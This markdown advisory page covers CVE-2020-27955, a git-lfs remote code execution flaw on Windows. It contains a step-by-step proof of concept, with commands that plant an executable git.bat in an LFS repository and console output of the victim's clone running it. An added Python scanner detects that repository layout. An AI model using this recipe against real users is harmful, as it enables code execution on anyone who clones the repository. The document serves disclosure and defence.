File: Git-LFS-RCE-Exploit-CVE-2020-27955.md (2.64 KB, 2021-05-21 09:14:38)
# Git <= 2.29.2 Git-LFS-RCE-Exploit-CVE-2020-27955
Git is a free, open-source distributed version control system designed to handle everything from small to very large projects quickly and efficiently. Git LFS (git-lfs) in versions <= 2.12 contains a vulnerability that allows remote command execution: an attacker can run arbitrary code on a victim's Windows system.
Git LFS is "an open source Git extension for versioning large files."
https://git-lfs.github.com/
Official site: https://git-scm.com/
Discovered by: Dawid Golunski
PoC:
Prepare the git-lfs PoC for git using the following steps:
```
Attacker:
On a separate linux system (to prevent execution on the localhost on commit):
1. Create a new repository:
mkdir git-lfs-RCE-exploit
cd git-lfs-RCE-exploit
git init
2. Prepare a malicious executable. E.g: git.bat with the following contents:
@echo hacked > GITHACKED
3. Add the executable to the repository:
git add git.bat
4. Add LFS file entries to the repository. This is necessary to trigger
the vulnerable git-lfs submodule when the repository is cloned and processed
by the main git process.
git lfs track "*.dat"
git add .gitattributes
echo "git exploit PoC" > big-bug-lfs-file.dat
git add big-bug-lfs-file.dat
5. Commit both the exploit and the lfs files:
git commit -a -m "Big Data, powered by Git LFS & the git-lfs exploit"
6. Push the changes to the repository:
git remote add origin https://github.com/some-user-name/lfspoc
git push -u origin master
Victim:
On windows, run powershell.exe shell and clone the PoC repo:
git clone https://github.com/some-user-name/lfspoc .
At this point the malicious executable (git.bat) will be downloaded into the repo's directory
and automatically executed by the git-lfs submodule without any user interaction.
As a result, 'GITHACKED' file should appear in the repo's directory
To check, type:
dir
Alternatively, a demo repository with a plain-text bat file located at
https://github.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955.git
can be used as follows:
C:\Users\victim> git clone https://github.com/ExploitBox/git-lfs-RCE-exploit-CVE-2020-27955.git .
Cloning into '.'...
remote: Enumerating objects: 24, done.
remote: Counting objects: 100% (24/24), done.
remote: Compressing objects: 100% (15/15), done.
remote: Total 24 (delta 5), reused 17 (delta 1), pack-reused 0
Receiving objects: 100% (24/24), done.
Resolving deltas: 100% (5/5), done.
...
C:\Users\victim> type GITHACKED
hacked
```
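The PoC above works because the cloned tree places an executable named like the git binary (git.bat) next to LFS-tracked files, and a vulnerable git-lfs on Windows resolves and runs it from the working tree. The following script is an added defensive check, not code from the advisory or from the git-lfs project: it scans a checked-out repository for those two ingredients together (LFS filter entries in .gitattributes and a file whose name shadows `git`) and returns a risk verdict, so such a repository can be flagged before it is handled on a host that still runs a vulnerable git-lfs. The name list `SUSPICIOUS_NAMES`, the `risk` labels and the sample trees it builds are assumptions and constructed data, not anything from the page.

```python
"""Defensive check for the CVE-2020-27955 clone pattern (added example).

Scans a working tree for LFS-tracked path patterns in .gitattributes and for
files whose name would shadow the git binary on Windows. Both present
together is the layout the PoC uses. Name list and risk labels are assumptions.
"""
import os
import re
import tempfile

# Names Windows would resolve for a bare "git" command when the working tree is
# searched before the real installation (assumption: a typical PATHEXT set).
SUSPICIOUS_NAMES = {"git.bat", "git.cmd", "git.exe", "git.com", "git.ps1"}

# Matches ".gitattributes" lines such as "*.dat filter=lfs diff=lfs merge=lfs -text"
LFS_ATTR_RE = re.compile(r"^\s*(\S+)\s+.*\bfilter=lfs\b")


def lfs_patterns(repo_dir):
    """Return the path patterns that .gitattributes routes through the LFS filter."""
    path = os.path.join(repo_dir, ".gitattributes")
    if not os.path.isfile(path):
        return []
    patterns = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            m = LFS_ATTR_RE.match(line)
            if m:
                patterns.append(m.group(1))
    return patterns


def git_named_executables(repo_dir):
    """Return repo-relative paths of files whose name shadows the git binary."""
    hits = []
    for root, dirs, files in os.walk(repo_dir):
        dirs[:] = [d for d in dirs if d != ".git"]  # never descend into git metadata
        for name in files:
            if name.lower() in SUSPICIOUS_NAMES:
                hits.append(os.path.relpath(os.path.join(root, name), repo_dir))
    return sorted(hits)


def assess(repo_dir):
    """Combine both signals into a verdict: high only when the PoC layout is complete."""
    patterns = lfs_patterns(repo_dir)
    shadows = git_named_executables(repo_dir)
    if patterns and shadows:
        risk = "high"
    elif patterns or shadows:
        risk = "low"
    else:
        risk = "none"
    return {"lfs_patterns": patterns, "git_shadow_files": shadows, "risk": risk}


def build_sample_repo(base_dir, with_shadow=True):
    """Construct a working tree mirroring the PoC layout (constructed sample data)."""
    os.makedirs(os.path.join(base_dir, ".git"), exist_ok=True)
    with open(os.path.join(base_dir, ".gitattributes"), "w") as fh:
        fh.write("*.dat filter=lfs diff=lfs merge=lfs -text\n")
    with open(os.path.join(base_dir, "big-bug-lfs-file.dat"), "w") as fh:
        fh.write("constructed LFS sample\n")
    if with_shadow:
        # Placeholder content only; the file is inspected by name, never executed.
        with open(os.path.join(base_dir, "git.bat"), "w") as fh:
            fh.write("@echo constructed sample\n")
    return base_dir


def demo():
    """Assess a PoC-shaped tree and a benign LFS-only tree; returns both verdicts."""
    with tempfile.TemporaryDirectory() as tmp:
        poc = build_sample_repo(os.path.join(tmp, "poc"), with_shadow=True)
        benign = build_sample_repo(os.path.join(tmp, "benign"), with_shadow=False)
        return assess(poc)["risk"], assess(benign)["risk"]


if __name__ == "__main__":
    print(demo())  # ('high', 'low')
```

Run it against any existing checkout with `assess("/path/to/repo")`; an LFS-only repository scores "low" (LFS use alone is normal), while the combination the PoC relies on scores "high". The check is a triage aid, not a substitute for upgrading git-lfs.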
References:
https://legalhackers.com/advisories/Git-LFS-RCE-Exploit-CVE-2020-27955.html
https://exploitbox.io/vuln/Git-Git-LFS-RCE-Exploit-CVE-2020-27955.html
https://forum.ywhack.com/thread-114689-1-5.html